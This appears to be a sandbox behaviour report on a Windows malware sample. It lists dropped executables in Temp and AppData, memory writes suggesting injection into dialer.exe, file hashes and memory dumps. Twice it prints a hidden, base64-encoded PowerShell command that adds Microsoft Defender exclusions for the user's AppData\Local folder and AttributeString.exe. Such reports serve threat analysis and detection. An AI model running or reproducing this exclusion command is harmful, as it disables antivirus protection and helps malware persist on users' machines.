PID 1172 wrote to memory of 1784 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe
PID 1172 wrote to memory of 1784 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe
PID 1172 wrote to memory of 1784 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe
PID 1172 wrote to memory of 1784 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe
PID 1172 wrote to memory of 1784 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe
PID 1784 wrote to memory of 3224 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Windows\SysWOW64\dialer.exe
PID 1784 wrote to memory of 3224 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Windows\SysWOW64\dialer.exe
PID 1784 wrote to memory of 3224 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Windows\SysWOW64\dialer.exe
PID 1784 wrote to memory of 3224 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Windows\SysWOW64\dialer.exe
PID 1784 wrote to memory of 3224 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Windows\SysWOW64\dialer.exe
PID 2024 wrote to memory of 2236 N/A C:\Users\Admin\AppData\Local\Temp\BBLb.exe C:\Users\Admin\AppData\Local\Temp\BBLb.exe
PID 2024 wrote to memory of 2236 N/A C:\Users\Admin\AppData\Local\Temp\BBLb.exe C:\Users\Admin\AppData\Local\Temp\BBLb.exe
PID 2024 wrote to memory of 2236 N/A C:\Users\Admin\AppData\Local\Temp\BBLb.exe C:\Users\Admin\AppData\Local\Temp\BBLb.exe
PID 2024 wrote to memory of 4068 N/A C:\Users\Admin\AppData\Local\Temp\BBLb.exe C:\Users\Admin\AppData\Local\Temp\BBLb.exe
PID 2024 wrote to memory of 4068 N/A C:\Users\Admin\AppData\Local\Temp\BBLb.exe C:\Users\Admin\AppData\Local\Temp\BBLb.exe
PID 2024 wrote to memory of 4068 N/A C:\Users\Admin\AppData\Local\Temp\BBLb.exe C:\Users\Admin\AppData\Local\Temp\BBLb.exe
PID 2024 wrote to memory of 4008 N/A C:\Users\Admin\AppData\Local\Temp\BBLb.exe C:\Users\Admin\AppData\Local\Temp\BBLb.exe
PID 2024 wrote to memory of 4008 N/A C:\Users\Admin\AppData\Local\Temp\BBLb.exe C:\Users\Admin\AppData\Local\Temp\BBLb.exe
PID 2024 wrote to memory of 4008 N/A C:\Users\Admin\AppData\Local\Temp\BBLb.exe C:\Users\Admin\AppData\Local\Temp\BBLb.exe
PID 2024 wrote to memory of 4008 N/A C:\Users\Admin\AppData\Local\Temp\BBLb.exe C:\Users\Admin\AppData\Local\Temp\BBLb.exe
PID 2024 wrote to memory of 4008 N/A C:\Users\Admin\AppData\Local\Temp\BBLb.exe C:\Users\Admin\AppData\Local\Temp\BBLb.exe
PID 2024 wrote to memory of 4008 N/A C:\Users\Admin\AppData\Local\Temp\BBLb.exe C:\Users\Admin\AppData\Local\Temp\BBLb.exe
PID 2024 wrote to memory of 4008 N/A C:\Users\Admin\AppData\Local\Temp\BBLb.exe C:\Users\Admin\AppData\Local\Temp\BBLb.exe
PID 2024 wrote to memory of 4008 N/A C:\Users\Admin\AppData\Local\Temp\BBLb.exe C:\Users\Admin\AppData\Local\Temp\BBLb.exe
PID 3244 wrote to memory of 5040 N/A C:\Users\Admin\AppData\Local\TypeId\dylawcqb\AttributeString.exe C:\Users\Admin\AppData\Local\TypeId\dylawcqb\AttributeString.exe
PID 3244 wrote to memory of 5040 N/A C:\Users\Admin\AppData\Local\TypeId\dylawcqb\AttributeString.exe C:\Users\Admin\AppData\Local\TypeId\dylawcqb\AttributeString.exe
PID 3244 wrote to memory of 5040 N/A C:\Users\Admin\AppData\Local\TypeId\dylawcqb\AttributeString.exe C:\Users\Admin\AppData\Local\TypeId\dylawcqb\AttributeString.exe
PID 3244 wrote to memory of 1368 N/A C:\Users\Admin\AppData\Local\TypeId\dylawcqb\AttributeString.exe C:\Users\Admin\AppData\Local\TypeId\dylawcqb\AttributeString.exe
PID 3244 wrote to memory of 1368 N/A C:\Users\Admin\AppData\Local\TypeId\dylawcqb\AttributeString.exe C:\Users\Admin\AppData\Local\TypeId\dylawcqb\AttributeString.exe
PID 3244 wrote to memory of 1368 N/A C:\Users\Admin\AppData\Local\TypeId\dylawcqb\AttributeString.exe C:\Users\Admin\AppData\Local\TypeId\dylawcqb\AttributeString.exe
PID 3244 wrote to memory of 1368 N/A C:\Users\Admin\AppData\Local\TypeId\dylawcqb\AttributeString.exe C:\Users\Admin\AppData\Local\TypeId\dylawcqb\AttributeString.exe
PID 3244 wrote to memory of 1368 N/A C:\Users\Admin\AppData\Local\TypeId\dylawcqb\AttributeString.exe C:\Users\Admin\AppData\Local\TypeId\dylawcqb\AttributeString.exe
PID 3244 wrote to memory of 1368 N/A C:\Users\Admin\AppData\Local\TypeId\dylawcqb\AttributeString.exe C:\Users\Admin\AppData\Local\TypeId\dylawcqb\AttributeString.exe
PID 3244 wrote to memory of 1368 N/A C:\Users\Admin\AppData\Local\TypeId\dylawcqb\AttributeString.exe C:\Users\Admin\AppData\Local\TypeId\dylawcqb\AttributeString.exe
PID 3244 wrote to memory of 1368 N/A C:\Users\Admin\AppData\Local\TypeId\dylawcqb\AttributeString.exe C:\Users\Admin\AppData\Local\TypeId\dylawcqb\AttributeString.exe
PID 3964 wrote to memory of 1288 N/A C:\Users\Admin\AppData\Local\Temp\vctuacx.exe C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe
PID 3964 wrote to memory of 1288 N/A C:\Users\Admin\AppData\Local\Temp\vctuacx.exe C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe
PID 3964 wrote to memory of 1288 N/A C:\Users\Admin\AppData\Local\Temp\vctuacx.exe C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe
PID 1288 wrote to memory of 1552 N/A C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe

Processes

C:\Windows\system32\sihost.exe

sihost.exe

C:\Users\Admin\AppData\Local\Temp\c0facaa9561e361afe9d92d38e2793a0.exe

"C:\Users\Admin\AppData\Local\Temp\c0facaa9561e361afe9d92d38e2793a0.exe"

C:\Users\Admin\AppData\Local\Temp\vctuacx.exe

"C:\Users\Admin\AppData\Local\Temp\vctuacx.exe"

C:\Users\Admin\AppData\Local\Temp\c0facaa9561e361afe9d92d38e2793a0.exe

"C:\Users\Admin\AppData\Local\Temp\c0facaa9561e361afe9d92d38e2793a0.exe"

C:\Users\Admin\AppData\Local\Temp\vctuacx.exe

"C:\Users\Admin\AppData\Local\Temp\vctuacx.exe"

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x514 0x518

C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe

"C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe" 0

C:\Users\Admin\AppData\Local\Temp\BBLb.exe

"C:\Users\Admin\AppData\Local\Temp\BBLb.exe"

C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe

C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe

C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe

C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe

C:\Windows\SysWOW64\dialer.exe

"C:\Windows\system32\dialer.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 1784 -ip 1784

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1784 -s 448

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 1784 -ip 1784

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1784 -s 480

C:\Users\Admin\AppData\Local\Temp\BBLb.exe

C:\Users\Admin\AppData\Local\Temp\BBLb.exe

C:\Users\Admin\AppData\Local\Temp\BBLb.exe

C:\Users\Admin\AppData\Local\Temp\BBLb.exe

C:\Users\Admin\AppData\Local\Temp\BBLb.exe

C:\Users\Admin\AppData\Local\Temp\BBLb.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABBAHQAdAByAGkAYgB1AHQAZQBTAHQAcgBpAG4AZwAuAGUAeABlADsA

C:\Users\Admin\AppData\Local\TypeId\dylawcqb\AttributeString.exe

C:\Users\Admin\AppData\Local\TypeId\dylawcqb\AttributeString.exe

C:\Users\Admin\AppData\Local\TypeId\dylawcqb\AttributeString.exe

C:\Users\Admin\AppData\Local\TypeId\dylawcqb\AttributeString.exe

C:\Users\Admin\AppData\Local\TypeId\dylawcqb\AttributeString.exe

C:\Users\Admin\AppData\Local\TypeId\dylawcqb\AttributeString.exe

C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe

"C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe" 0

C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe

C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe

C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe

C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe

C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe

C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe

C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe

C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe

C:\Windows\SysWOW64\dialer.exe

"C:\Windows\system32\dialer.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 1452 -ip 1452

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1452 -s 420

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 1452 -ip 1452

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1452 -s 452

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABBAHQAdAByAGkAYgB1AHQAZQBTAHQAcgBpAG4AZwAuAGUAeABlADsA

Network


Files

memory/4800-2-0x00000000770E2000-0x00000000770E3000-memory.dmp

memory/4800-3-0x00000000006D0000-0x00000000006D1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\vctuacx.exe

MD5 d6bfa5d4d5d67dd73013e5b400cac2e7
SHA1 725f7fec0fd1f245c44ab1c228cd349a5e12bd71
SHA256 fa40dc2c8055f953099d7d354ba97fbf3a5f3aa501ce95cb8cefa810b80ea5d4
SHA512 e5d58b64de4d398290d0cd79d44a516ca2528bd183566926ea1f3b9211b20fa5c2244bcc8bd3cc1f3b1d470dc257b72b8d3530d682fff00b7b52227c6c3c7808

memory/896-17-0x00000000005F0000-0x00000000005F1000-memory.dmp

memory/4800-18-0x0000000003300000-0x0000000003307000-memory.dmp

memory/4424-19-0x0000000000400000-0x0000000000667000-memory.dmp

memory/4424-21-0x0000000000400000-0x0000000000667000-memory.dmp

memory/4424-22-0x0000000000400000-0x0000000000667000-memory.dmp

memory/3964-20-0x0000000000400000-0x0000000000409000-memory.dmp

memory/4424-23-0x0000000000400000-0x0000000000663000-memory.dmp

memory/3964-27-0x0000000000400000-0x0000000000409000-memory.dmp

memory/4424-29-0x0000000000400000-0x0000000000667000-memory.dmp

memory/4424-28-0x00000000770E2000-0x00000000770E3000-memory.dmp

memory/3964-31-0x00000000770E2000-0x00000000770E3000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\bassmod.dll

MD5 e3a6587ba5a4ee4514ecaa4265dd9b2c
SHA1 b44bb9b5fc3478fa6ea5140603857ee0c2d4c4fd
SHA256 566934a049ae41fe36e2e122825875e5c02d4db083e744a7a3c94f456cec2f94
SHA512 90f4e5ceac00a0815452ef951feb3aa29e6ef408d8d4cda023c3fdd49ba0238e06589cee9cc0be842eddd1b02bd1d448d9ab8bdaed70651b38d6074c9f99d22f

C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe

MD5 1a917a85dcbb1d3df5f4dd02e3a62873
SHA1 567f528fec8e7a4787f8c253446d8f1b620dc9d6
SHA256 217fbf967c95d1359314fcd53ae8d04489eb3c7bdc1f22110d5a8a476d1fc92e
SHA512 341acbd43efac1718c7f3e3795549acf29237a2675bdadcb7e52ce18aac6dcc6ae628e1b6edfa2338ed6d9923c148cb4322c75fad86d5c0e6f2327c2270563ec

C:\Users\Admin\AppData\Local\Temp\BBLb.exe

MD5 71eb1bc6e6da380c1cb552d78b391b2a
SHA1 df3278e6e26d8c0bc878fe0a8c8a91b28c5a652d
SHA256 cefa92ee6cc2fad86c49dd37d57ff8afcb9b9abef0a110689e6d771394256bd6
SHA512 d6fab2c469924b8202f7964e864f66d6b6151937c8d134fb40e1f1d3787cf22328892c3f7209786e0b42e1abd5ca71a61f40538ef1e93534d2a98bf6d4448e90

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\BBLb.exe.log

MD5 4a911455784f74e368a4c2c7876d76f4
SHA1 a1700a0849ffb4f26671eb76da2489946b821c34
SHA256 264098e15b5b33d425f3b76e45b7976b58f917048125041135f7e60d8151108c
SHA512 4617591400409e1930195795a55e20d5f063042bb3e9fd1955099066e507b6ac8a1e3ae54cc42418e2639149b31bf7e58cd5743670d9030a15e29f14d813815d

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cvgevfn0.ps1.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe

MD5 20d8bc77b286c2c0de4347d356f8bc0f
SHA1 10f4664c0361b0dc1f37c6b393f451b9ff836f11
SHA256 a10a6603774bfd2623aa256882b47fa5480ea216ba3f99a23d8c96bb77e96247
SHA512 96d64b2c24e36c1245d4986aa129a78bb13417efa95e712b590f4332853f2f04d1d731dec82d062b39f7b5043da81ccc91de91141dc0ffe0dbd0c4f68a698819

C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe

MD5 7d4777ed6d9818a912c0cefc9f12dcfc
SHA1 48001b580d7a36f39823fd391411b3a32e39faba
SHA256 6862447b716d9ebac197fad0eda503fc81576fd86de9871dbfb82586b60751f6
SHA512 b898461eb44a0dd1958581a0e0cbb18b7d5ba88dcfc652bea73d84361936c1a90c40aacb4c3bf4dbfe424ddf441460c5342a5b5acb5f6605d355cefc62890414

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 6d3e9c29fe44e90aae6ed30ccf799ca8
SHA1 c7974ef72264bbdf13a2793ccf1aed11bc565dce
SHA256 2360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d
SHA512 60c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a